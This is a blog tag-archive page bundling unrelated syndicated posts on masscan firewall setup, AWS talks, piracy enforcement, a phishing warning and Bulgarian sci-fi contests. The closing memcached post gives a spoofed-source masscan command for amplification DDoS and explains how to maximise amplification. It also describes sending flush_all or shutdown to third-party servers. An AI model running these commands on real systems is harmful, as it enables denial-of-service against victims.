Tag Archives: .net

masscan, macOS, and firewall

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/masscan-macos-and-firewall.html

One of the more useful features of masscan is the “–banners” check, which connects to the TCP port, sends some request, and gets a basic response back. However, since masscan has it’s own TCP stack, it’ll interfere with the operating system’s TCP stack if they are sharing the same IPv4 address. The operating system will reply with a RST packet before the TCP connection can be established.

The way to fix this is to use the built-in packet-filtering firewall to block those packets in the operating-system TCP/IP stack. The masscan program still sees everything before the packet-filter, but the operating system can’t see anything after the packet-filter.

Note that we are talking about the “packet-filter” firewall feature here. Remember that macOS, like most operating systems these days, has two separate firewalls: an application firewall and a packet-filter firewall. The application firewall is the one you see in System Settings labeled “Firewall”, and it controls things based upon the application’s identity rather than by which ports it uses. This is normally “on” by default. The packet-filter is normally “off” by default and is of little use to normal users.

Also note that macOS changed packet-filters around version 10.10.5 (“Yosemite”, October 2014). The older one is known as “ipfw“, which was the default firewall for FreeBSD (much of macOS is based on FreeBSD). The replacement is known as PF, which comes from OpenBSD. Whereas you used to use the old “ipfw” command on the command line, you now use the “pfctl” command, as well as the “/etc/pf.conf” configuration file.

What we need to filter is the source port of the packets that masscan will send, so that when replies are received, they won’t reach the operating-system stack, and just go to masscan instead. To do this, we need find a range of ports that won’t conflict with the operating system. Namely, when the operating system creates outgoing connections, it randomly chooses a source port within a certain range. We want to use masscan to use source ports in a different range.

To figure out the range macOS uses, we run the following command:

sysctl net.inet.ip.portrange.first net.inet.ip.portrange.last

On my laptop, which is probably the default for macOS, I get the following range. Sniffing with Wireshark confirms this is the range used for source ports for outgoing connections.

net.inet.ip.portrange.first: 49152
net.inet.ip.portrange.last: 65535

So this means I shouldn’t use source ports anywhere in the range 49152 to 65535. On my laptop, I’ve decided to use for masscan the ports 40000 to 41023. The range masscan uses must be a power of 2, so here I’m using 1024 (two to the tenth power).

To configure masscan, I can either type the parameter “–source-port 40000-41023” every time I run the program, or I can add the following line to /etc/masscan/masscan.conf. Remember that by default, masscan will look in that configuration file for any configuration parameters, so you don’t have to keep retyping them on the command line.

source-port = 40000-41023

Next, I need to add the following firewall rule to the bottom of /etc/pf.conf:

block in proto tcp from any to any port 40000 >< 41024

However, we aren’t done yet. By default, the packet-filter firewall is off. Therefore, every time you reboot your computer, you need to enable it. The simple way to do this is on the command line run:

pfctl -e

Or, if that doesn’t work, try:

pfctl -E

Ideally, you’d want it to start automatically on bootup. I haven’t figure out how to do this one macOS in an approved fashion that doesn’t conflict with something else. Apparently there are a few GUIs that will do this for you.

AWS Online Tech Talks – May and Early June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-may-and-early-june-2018/

AWS Online Tech Talks – May and Early June 2018  

Join us this month to learn about some of the exciting new services and solution best practices at AWS. We also have our first re:Invent 2018 webinar series, “How to re:Invent”. Sign up now to learn more, we look forward to seeing you.

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

Analytics & Big Data

May 21, 2018 | 11:00 AM – 11:45 AM PT Integrating Amazon Elasticsearch with your DevOps Tooling – Learn how you can easily integrate Amazon Elasticsearch Service into your DevOps tooling and gain valuable insight from your log data.

May 23, 2018 | 11:00 AM – 11:45 AM PTData Warehousing and Data Lake Analytics, Together – Learn how to query data across your data warehouse and data lake without moving data.

May 24, 2018 | 11:00 AM – 11:45 AM PTData Transformation Patterns in AWS – Discover how to perform common data transformations on the AWS Data Lake.

Compute

May 29, 2018 | 01:00 PM – 01:45 PM PT – Creating and Managing a WordPress Website with Amazon Lightsail – Learn about Amazon Lightsail and how you can create, run and manage your WordPress websites with Amazon’s simple compute platform.

May 30, 2018 | 01:00 PM – 01:45 PM PTAccelerating Life Sciences with HPC on AWS – Learn how you can accelerate your Life Sciences research workloads by harnessing the power of high performance computing on AWS.

Containers

May 24, 2018 | 01:00 PM – 01:45 PM PT – Building Microservices with the 12 Factor App Pattern on AWS – Learn best practices for building containerized microservices on AWS, and how traditional software design patterns evolve in the context of containers.

Databases

May 21, 2018 | 01:00 PM – 01:45 PM PTHow to Migrate from Cassandra to Amazon DynamoDB – Get the benefits, best practices and guides on how to migrate your Cassandra databases to Amazon DynamoDB.

May 23, 2018 | 01:00 PM – 01:45 PM PT5 Hacks for Optimizing MySQL in the Cloud – Learn how to optimize your MySQL databases for high availability, performance, and disaster resilience using RDS.

DevOps

May 23, 2018 | 09:00 AM – 09:45 AM PT.NET Serverless Development on AWS – Learn how to build a modern serverless application in .NET Core 2.0.

Enterprise & Hybrid

May 22, 2018 | 11:00 AM – 11:45 AM PTHybrid Cloud Customer Use Cases on AWS – Learn how customers are leveraging AWS hybrid cloud capabilities to easily extend their datacenter capacity, deliver new services and applications, and ensure business continuity and disaster recovery.

IoT

May 31, 2018 | 11:00 AM – 11:45 AM PTUsing AWS IoT for Industrial Applications – Discover how you can quickly onboard your fleet of connected devices, keep them secure, and build predictive analytics with AWS IoT.

Machine Learning

May 22, 2018 | 09:00 AM – 09:45 AM PTUsing Apache Spark with Amazon SageMaker – Discover how to use Apache Spark with Amazon SageMaker for training jobs and application integration.

May 24, 2018 | 09:00 AM – 09:45 AM PTIntroducing AWS DeepLens – Learn how AWS DeepLens provides a new way for developers to learn machine learning by pairing the physical device with a broad set of tutorials, examples, source code, and integration with familiar AWS services.

Management Tools

May 21, 2018 | 09:00 AM – 09:45 AM PTGaining Better Observability of Your VMs with Amazon CloudWatch – Learn how CloudWatch Agent makes it easy for customers like Rackspace to monitor their VMs.

Mobile

May 29, 2018 | 11:00 AM – 11:45 AM PT – Deep Dive on Amazon Pinpoint Segmentation and Endpoint Management – See how segmentation and endpoint management with Amazon Pinpoint can help you target the right audience.

Networking

May 31, 2018 | 09:00 AM – 09:45 AM PTMaking Private Connectivity the New Norm via AWS PrivateLink – See how PrivateLink enables service owners to offer private endpoints to customers outside their company.

Security, Identity, & Compliance

May 30, 2018 | 09:00 AM – 09:45 AM PT – Introducing AWS Certificate Manager Private Certificate Authority (CA) – Learn how AWS Certificate Manager (ACM) Private Certificate Authority (CA), a managed private CA service, helps you easily and securely manage the lifecycle of your private certificates.

June 1, 2018 | 09:00 AM – 09:45 AM PTIntroducing AWS Firewall Manager – Centrally configure and manage AWS WAF rules across your accounts and applications.

Serverless

May 22, 2018 | 01:00 PM – 01:45 PM PTBuilding API-Driven Microservices with Amazon API Gateway – Learn how to build a secure, scalable API for your application in our tech talk about API-driven microservices.

Storage

May 30, 2018 | 11:00 AM – 11:45 AM PTAccelerate Productivity by Computing at the Edge – Learn how AWS Snowball Edge support for compute instances helps accelerate data transfers, execute custom applications, and reduce overall storage costs.

June 1, 2018 | 11:00 AM – 11:45 AM PTLearn to Build a Cloud-Scale Website Powered by Amazon EFS – Technical deep dive where you’ll learn tips and tricks for integrating WordPress, Drupal and Magento with Amazon EFS.

 

 

 

 

Steam Censors MEGA.nz Links in Chats and Forum Posts

Post Syndicated from Ernesto original https://torrentfreak.com/steam-censors-mega-nz-links-in-chats-and-forum-posts-180421/

With more than 150 million registered accounts, Steam is much more than just a game distribution platform.

For many people, it’s also a social hangout and a communication channel.

Steam’s instant messaging tool, for example, is widely used for chats with friends. About games of course, but also to discuss lots of other stuff.

While Valve doesn’t mind people socializing on its platform, there are certain things the company doesn’t want Steam users to share. This includes links to the cloud hosting service Mega.

Users who’d like to show off some gaming footage, or even a collection of cat pictures they stored on Mega, are unable to do so. As it turns out, Steam actively censors these type of links from forum posts and chats.

In forum posts, these offending links are replaced by the text {LINK REMOVED} and private chats get the same treatment. Instead of the Mega link, people on the other end only get a mention that a link was removed.

Mega link removed from chat

While Mega operates as a regular company that offers cloud hosting services, Steam notes on their website that the website is “potentially malicious.”

“The site could contain malicious content or be known for stealing user credentials,” Steam’s link checker warns.

Potentially malicious…

It’s unclear what malicious means in this context. Mega has never been flagged by Google’s Safe Browsing program, which is regarded as one of the industry standards for malware and other unwanted software.

What’s more likely is that Mega’s piracy stigma has something to do with the censoring. As it turns out, Steam also censors 4shared.com, as well as Pirate Bay’s former .se domain name.

Other “malicious sites” which get the same treatment are more game oriented, such as cheathappens.com and the CSGO Skin Screenshot site metjm.net. While it’s understandable some game developers don’t like these, malicious is a rather broad term in this regard.

Mega clearly refutes that they are doing anything wrong. Mega Chairman Stephen Hall tells TorrentFreak that the company swiftly removes any malicious content, once it receives an abuse notice.

“It is crazy for sites to block Mega links as we respond very quickly to disable any links that are reported as malware, generally much quicker than our competitors,” Hall says.

Valve did not immediately reply to our request for clarification so the precise reason for the link censoring remains unknown.

That said, when something’s censored the public tends to work around any restrictions. Mega links are still being shared on Steam, with a slightly altered URL. In addition, Mega’s backup domain Mega.co.nz still works fine too.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Конкурси… и алманаси :)

Post Syndicated from Григор original http://www.gatchev.info/blog/?p=2131

Две обяви, насочени към всички любители на фантастиката:

1

НА ВАШЕТО ВНИМАНИЕ – „ФАНТАSTIKA 2017“

Излезе от печат осмият пореден алманах „ФантАstika“. Негов съставител, както винаги досега, е Атанас П. Славов – председател на Дружеството на българските фантасти „Тера Фантазия“.
Алманахът е интересен не само за читателите, запознати с предишните ежегодници, но и за ценителите на супержанра (във всичките му форми), които за пръв път ще вземат това издание в ръцете си.

Преводните автори са застъпени с оригинална новела на аржентинката Тереса Мира де Ечеверия, класически разказ на американеца Томас Шеред и една творба от македонския фантаст Никола Суботич, наскоро отличена в конкурса „Агоп Мелконян“.

В големия раздел на родните фантасти ще се срещнете както с доайена Христо Пощаков, представен като майстор на научната фантастика, фентъзито и хумора, така и с нови произведения от Ценка Бакърджиева, Валентин Д. Иванов, Мартин Петков, Янчо Чолаков, а също и с приказка от дебютната книга на Мел.

И сега разделът „Фантастология“ е посветен на обзори и тенденции в развитието на нашата и световната фантастика, плюс задочни срещи с класици като Светослав Минков и Елин Пелин, видени през погледа на Боряна Владимирова и Александър Карапанчев. Няколко статии разглеждат испаноезични писателки, руски тематични направления в модерната НФ, българската фантастика в нова аудио форма и последния брой на списание „Тера фантастика“.

В раздела „Съзвездие Кинотавър“ ще се запознаете с някои от актуалните екранизации на фантастични романи, с англичанина, създал сценария на „Изкуствен интелект“, и с шеговит комикс (за това как на Кубрик му е изглеждало бъдещето през 2019 година).

Броят обявява уникалния по темата си конкурс „Изгревът на следващото“ – за разкази, посветени на едно желаемо бъдеще. Разделът „Футурум“ включва статии за новите информационни религии, несъстояли се финали на света и особено любопитна фаКтастика.

И още по страниците на този алманах: подбрани картини от художника Андриан Бекяров… пристрастен репортаж за Еврокон 2017 в Дортмунд… поезия… и много други събития от неизчерпаемата сфера на въображението.

За повече информация: http://choveshkata.net/blog/?p=6617.

2

Дружество на българските фантасти „Тера Фантазия“ и фондация „Човешката библиотека“ канят всички автори да участват в първия Конкурс „Изгревът на следващото“.

В момента се провежда не един конкурс за български художествени текстове, но този е единственият, който има за тема възможното движение към позитивно бъдеще. Днес, в епохата на ширещи се антиутопии и безкритично катастрофично мислене, се изисква истинска интелектуална смелост, за да потърсим формите за Изхода. Смелост да допуснем, че Човешкият дух е в състояние да намери пътя си към по-високото ниво, интелект да си го представим и талант да го защитим художествено.

Какво е решението на задачата, наречена „Кризисно съвремие“?

Какво е решението, което води до по-висше състояние на ЧоВечността и Човечеството, към бъдеще, в което ЧоВечният Разум е надрасъл безчовечното невежество?

Какво е решението, което ще създаде свят, в който науките и технологиите ще се развиват, за да расте качеството на Човека, а не богатствата на единици?

Какво е решението, което ще избегне застиналите утопиянства, където позьорис бели хитони рецитират един на друг надути речи?

Конкурсът „Изгревът на следващото“ ще бъде мястото, където ще се публикуват истории, посветени на това търсене. Произведения, които с художествен талант и моделираща сила ще защитават нови светове от този вид по един от следните два начина:

  • По спиралата към следващото: Съдби на индивиди и общества, търсещи изхода от съвременното кризисно състояние на света ни; образи на учени, мислители и обикновени хора, напипващи в мрака на неизвестното пътищата към тази цел; приключения на личности, въвлечени в такъв спирален процес и постепенно осъзнаващи смисъла му.
  • Визии на следващото: Изграждане на образи, възникнали в нашето съвремие, но носещи белезите на новото, притежаващи вътрешната свобода, въпреки че са затворени в клетката на настоящата социална несвобода; образи на групи и общества, постигнали белези на следващото, без ескейпизъм, фанатизъм и аскетизъм. Хуманитарни технологии, водещи до освобождаване от опредметяването, разкриващи етическите и интелектуалните ресурси на ЧоВечното. Непротиворечиви и реалистично обрисувани общества на бъдещето, в които всяка личност е пълноценно разгърната и осъществена, без да зависи или да бъде притежавана от друга.

Приемливи са всички жанрове – достатъчно е разказите да засягат поне една от горните две теми.

Крайният срок за участие е 1 юни 2018 г.

Трите най-високо класирани разказа ще получат награди по 200 лв. и заедно с други подбрани заглавия от конкурса ще бъдат публикувани в следващите издания на алманаха „ФантАstika“.

Пълните условия са описани в сайта на Човешката библиотека: http://choveshkata.net/blog/?p=6668

Там ще откриете и най-актуална информация в случай на промени.

Backblaze Announces B2 Compute Partnerships

Post Syndicated from Gleb Budman original https://www.backblaze.com/blog/introducing-cloud-compute-services/

Backblaze Announces B2 Compute Partnerships

In 2015, we announced Backblaze B2 Cloud Storage — the most affordable, high performance storage cloud on the planet. The decision to release B2 as a service was in direct response to customers asking us if they could use the same cloud storage infrastructure we use for our Computer Backup service. With B2, we entered a market in direct competition with Amazon S3, Google Cloud Services, and Microsoft Azure Storage. Today, we have over 500 petabytes of data from customers in over 150 countries. At $0.005 / GB / month for storage (1/4th of S3) and $0.01 / GB for downloads (1/5th of S3), it turns out there’s a healthy market for cloud storage that’s easy and affordable.

As B2 has grown, customers wanted to use our cloud storage for a variety of use cases that required not only storage but compute. We’re happy to say that through partnerships with Packet & ServerCentral, today we’re announcing that compute is now available for B2 customers.

Cloud Compute and Storage

Backblaze has directly connected B2 with the compute servers of Packet and ServerCentral, thereby allowing near-instant (< 10 ms) data transfers between services. Also, transferring data between B2 and both our compute partners is free.

  • Storing data in B2 and want to run an AI analysis on it? — There are no fees to move the data to our compute partners.
  • Generating data in an application? — Run the application with one of our partners and store it in B2.
  • Transfers are free and you’ll save more than 50% off of the equivalent set of services from AWS.

These partnerships enable B2 customers to use compute, give our compute partners’ customers access to cloud storage, and introduce new customers to industry-leading storage and compute — all with high-performance, low-latency, and low-cost.

Is This a Big Deal? We Think So

Compute is one of the most requested services from our customers Why? Because it unlocks a number of use cases for them. Let’s look at three popular examples:

Transcoding Media Files

B2 has earned wide adoption in the Media & Entertainment (“M&E”) industry. Our affordable storage and download pricing make B2 great for a wide variety of M&E use cases. But many M&E workflows require compute. Content syndicators, like American Public Television, need the ability to transcode files to meet localization and distribution management requirements.

There are a multitude of reasons that transcode is needed — thumbnail and proxy generation enable M&E professionals to work efficiently. Without compute, the act of transcoding files remains cumbersome. Either the files need to be brought down from the cloud, transcoded, and then pushed back up or they must be kept locally until the project is complete. Both scenarios are inefficient.

Starting today, any content producer can spin up compute with one of our partners, pay by the hour for their transcode processing, and return the new media files to B2 for storage and distribution. The company saves money, moves faster, and ensures their files are safe and secure.

Disaster Recovery

Backblaze’s heritage is based on providing outstanding backup services. When you have incredibly affordable cloud storage, it ends up being a great destination for your backup data.

Most enterprises have virtual machines (“VMs”) running in their infrastructure and those VMs need to be backed up. In a disaster scenario, a business wants to know they can get back up and running quickly.

With all data stored in B2, a business can get up and running quickly. Simply restore your backed up VM to one of our compute providers, and your business will be able to get back online.

Since B2 does not place restrictions, delays, or penalties on getting data out, customers can get back up and running quickly and affordably.

Saving $74 Million (aka “The Dropbox Effect”)

Ten years ago, Backblaze decided that S3 was too costly a platform to build its cloud storage business. Instead, we created the Backblaze Storage Pod and our own cloud storage infrastructure. That decision enabled us to offer our customers storage at a previously unavailable price point and maintain those prices for over a decade. It also laid the foundation for Netflix Open Connect and Facebook Open Compute.

Dropbox recently migrated the majority of their cloud services off of AWS and onto Dropbox’s own infrastructure. By leaving AWS, Dropbox was able to build out their own data centers and still save over $74 Million. They achieved those savings by avoiding the fees AWS charges for storing and downloading data, which, incidentally, are five times higher than Backblaze B2.

For Dropbox, being able to realize savings was possible because they have access to enough capital and expertise that they can build out their own infrastructure. For companies that have such resources and scale, that’s a great answer.

“Before this offering, the economics of the cloud would have made our business simply unviable.” — Gabriel Menegatti, SlicingDice

The questions Backblaze and our compute partners pondered was “how can we democratize the Dropbox effect for our storage and compute customers? How can we help customers do more and pay less?” The answer we came up with was to connect Backblaze’s B2 storage with strategic compute partners and remove any transfer fees between them. You may not save $74 million as Dropbox did, but you can choose the optimal providers for your use case and realize significant savings in the process.

This Sounds Good — Tell Me More About Your Partners

We’re very fortunate to be launching our compute program with two fantastic partners in Packet and ServerCentral. These partners allow us to offer a range of computing services.

Packet

We recommend Packet for customers that need on-demand, high performance, bare metal servers available by the hour. They also have robust offerings for private / customized deployments. Their offerings end up costing 50-75% of the equivalent offerings from EC2.

To get started with Packet and B2, visit our partner page on Packet.net.

ServerCentral

ServerCentral is the right partner for customers that have business and IT challenges that require more than “just” hardware. They specialize in fully managed, custom cloud solutions that solve complex business and IT challenges. ServerCentral also has expertise in managed network solutions to address global connectivity and content delivery.

To get started with ServerCentral and B2, visit our partner page on ServerCentral.com.

What’s Next?

We’re excited to find out. The combination of B2 and compute unlocks use cases that were previously impossible or at least unaffordable.

“The combination of performance and price offered by this partnership enables me to create an entirely new business line. Before this offering, the economics of the cloud would have made our business simply unviable,” noted Gabriel Menegatti, co-founder at SlicingDice, a serverless data warehousing service. “Knowing that transfers between compute and B2 are free means I don’t have to worry about my business being successful. And, with download pricing from B2 at just $0.01 GB, I know I’m avoiding a 400% tax from AWS on data I retrieve.”

What can you do with B2 & compute? Please share your ideas with us in the comments. And, for those attending NAB 2018 in Las Vegas next week, please come by and say hello!

The post Backblaze Announces B2 Compute Partnerships appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

GoDaddy Ordered to Suspend Four Music Piracy Domains

Post Syndicated from Andy original https://torrentfreak.com/godaddy-ordered-to-suspend-four-music-piracy-domains-180327/

There are many methods used by copyright holders and the authorities in their quest to disable access to pirate sites.

Site blocking is one of the most popular but pressure can also be placed on web hosts to prevent them from doing business with questionable resources. A skip from one host to another usually solves the problem, however.

Another option is to target sites’ domains directly, by putting pressure on their registrars. It’s a practice that has famously seen The Pirate Bay burn through numerous domains in recent years, only for it to end up back on its original domain, apparently unscathed. Other sites, it appears, aren’t always so lucky.

As a full member of IFPI, the Peruvian Union of Phonographic Producers (UNIMPRO) protects the rights of record labels and musicians. Like its counterparts all over the world, UNIMPRO has a piracy problem and a complaint filed against four ‘pirate’ sites will now force the world’s largest domain registrar into action.

Mp3Juices-Download-Free.com, Melodiavip.net, Foxmusica.site and Fulltono.me were all music sites offering MP3 content without the copyright holders’ permission. None are currently available but the screenshot below shows how the first platform appeared before it was taken offline.

MP3 Juices Downnload Free

Following a complaint against the sites by UNIMPRO, the Copyright Commission (Comisión de Derecho de Autor) conducted an investigation into the platforms’ activities. The Commission found that the works they facilitated access to infringed copyright. It was also determined that each site generated revenue from advertising.

Given the illegal nature of the sites and the high volume of visitors they attract, the Commission determined that they were causing “irreparable damage” to legitimate copyright holders. Something, therefore, needed to be done.

The action against the sites involved the National Institute for the Defense of Competition and the Protection of Intellectual Property (Indecopi), an autonomous public body of the Peruvian state tasked with handling anti-competitive behavior, unfair competition, and intellectual property matters.

Indecopi HQ

After assessing the evidence, Indecopi, through the Copyright Commission, issued precautionary (interim) measures compelling US-based GoDaddy, the world’s largest domain registrar which handles the domains for all four sites, to suspend them with immediate effect.

“The Copyright Commission of INDECOPI issued four precautionary measures in order that the US company Godaddy.com, LLC (in its capacity as registrar of domain names) suspend the domains of four websites, through which it would have infringed the legislation on Copyright and Related Rights, by making available a large number of musical phonograms without the corresponding authorization, to the detriment of its legitimate owners,” Indecopi said in a statement.

“The suspension was based on the great evidence that was provided by the Commission, on the four websites that infringe copyright, and in the framework of the policy of support for the protection of intellectual property.”

Indecopi says that GoDaddy can file an appeal against the decision. At the time of writing, none of the four domains currently returns a working website.

TorrentFreak has requested a comment from GoDaddy but at the time of publication, we were yet to receive a response.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Поредната е-майл измама (този път „Fibank“)

Post Syndicated from Григор original http://www.gatchev.info/blog/?p=2125

Цитирам текста на съобщението, което получих днес:

—-

(логото на Fibank)

скъпи клиенти,

Вашата електронна сметка в Fibank.bg е временно заключена от съображения за сигурност.

Ако искате да активирате профила си, следвайте инструкциите по-долу.

можете да го направите тук:

Отключване на профила

С уважение,

Обслужване на клиенти

—-

Както се сещате, линкът „Отключване на профила“ не сочи към Fibank – сочи към домейна mobiocean.com. Домейнът е регистриран на лице със скрита информация, и сайтът е хостнат в secureserver.net – тоест, цялата схема е изпипана за целта на измамата.

Обърнете внимание на добрия български език и оригиналното лого в е-майла. В системата на измамниците с гаранция има и българи, като минимум като преводачи.

Сайтът, който ви очаква на линка, също е прилично копие на този на Fibank – включително масивното предупреждение срещу измами. Естествено, можете да въведете там каквито искате „потребител“ и „парола“ – той ги приема щастливо и „отключва“ акаунта ви.

Не се хващайте. Изсмучат ли кибепрестъпниците парите ви, българските банки ще ви помогнат да си ги върнете дълго след като цъфнат налъмите. Нагледал съм се на достатъчно случаи. Който сам се пази, и Господ го пази. Който не се пази сам, и Господ не може да го опази.

Owner of ShareBeast and AlbumJams Sentenced To Five Years in Prison

Post Syndicated from Andy original https://torrentfreak.com/owner-of-sharebeast-and-albumjams-sentenced-to-five-years-in-prison-180323/

According to the RIAA, ShareBeast.com and AlbumJams.com were responsible for the illegal distribution of “a massive library” of popular albums and tracks.

With a nod to the sensitivity of pre-release piracy, the sites were blamed for offering “thousands of songs” that hadn’t yet reached their official release dates. In September 2015, U.S. authorities shut them down, placing seizure notices on both domains.

The RIAA claimed that ShareBeast was the largest illegal file-sharing site operating in the United States, noting that the site’s IP addresses at the time indicated that at least some hosting had taken place in Illinois.

“Millions of users accessed songs from ShareBeast each month without one penny of compensation going to countless artists, songwriters, labels and others who created the music,” RIAA Chairman & CEO Cary Sherman commented at the time.

Two years later in September 2017, then 29-year-old former ShareBeast operator Artur Sargsyan pleaded guilty to one felony count of criminal copyright infringement, admitting to the unauthorized distribution and reproduction of over one billion copies of copyrighted works.

“Through Sharebeast and other related sites, this defendant profited by illegally distributing copyrighted music and albums on a massive scale,” said U. S. Attorney John Horn.

“The collective work of the FBI and our international law enforcement partners have shut down the Sharebeast websites and prevented further economic losses by scores of musicians and artists.”

The Department of Justice reported that from 2012 to 2015, Sargsyan used ShareBeast as a pirate music repository, illegally hosting music by Ariana Grande, Katy Perry, Beyonce, Kanye West, and Justin Bieber, among others. Sargsyan linked to that content from Newjams.net and Albumjams.com, and granted access to the public.

If Sargsyan had responded to takedown notices more positively, it’s possible that things may have progressed in a different direction. The RIAA sent the site more than 100 copyright-infringement emails over a three-year period but to no effect.

This led the music industry group to get out its calculator and inform the DoJ that the total monetary loss to its member companies was “a conservative” $6.3 billion “gut-punch” to music creators who were paid nothing by the service.

Given the huge numbers involved, it’s likely that Sargsyan hoped his 2017 guilty plea would result in a more forgiving sentence. Yesterday, however, the full weight of the law came crashing down.

California resident Artur Sargsyan was sentenced by U.S. District Judge Timothy C. Batten, Sr., to five years in prison, followed by three years of supervised release. The now 30-year-old was also ordered to pay $458,200 restitution and ordered to forfeit $184,768.87.

“Sargsyan operated one of the most successful illegal music sharing websites on the Internet,” said U.S. Attorney Byung J. “BJay” Pak.

“His reproduction of copyrighted musical works were made available only to generate undeserved profits for himself. The incredible work done by our law enforcement partners and prosecutors in light of the complexity of Sargsyan’s operation demonstrates that we will employ all of our resources to stop this kind of theft.”

David J. LaValley, Special Agent in Charge of FBI Atlanta, said that Sargsyan was warned several times that he was violating the law by illegally sharing copyrighted works, but chose to ignore the warnings.

“His sentence sends a message that no matter how complex the operation, the FBI, its federal partners and law enforcement partners around the globe will go to every length to protect the property of hard working artists and the companies that produce their art,” LaValley said.

Given the music group’s lengthy statements on the Sharebeast topic in the past, thus far the RIAA has been relatively brief. Welcoming news of the sentencing via Twitter, the major labels’ figurehead congratulated the law enforcement bodies behind the successful prosecution.

“Congrats to U.S. Attorney BJay Pak + his team along with @TheJusticeDept CCIPS Division and @FBIAtlanta for their leadership on this important case,” the RIAA wrote.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack: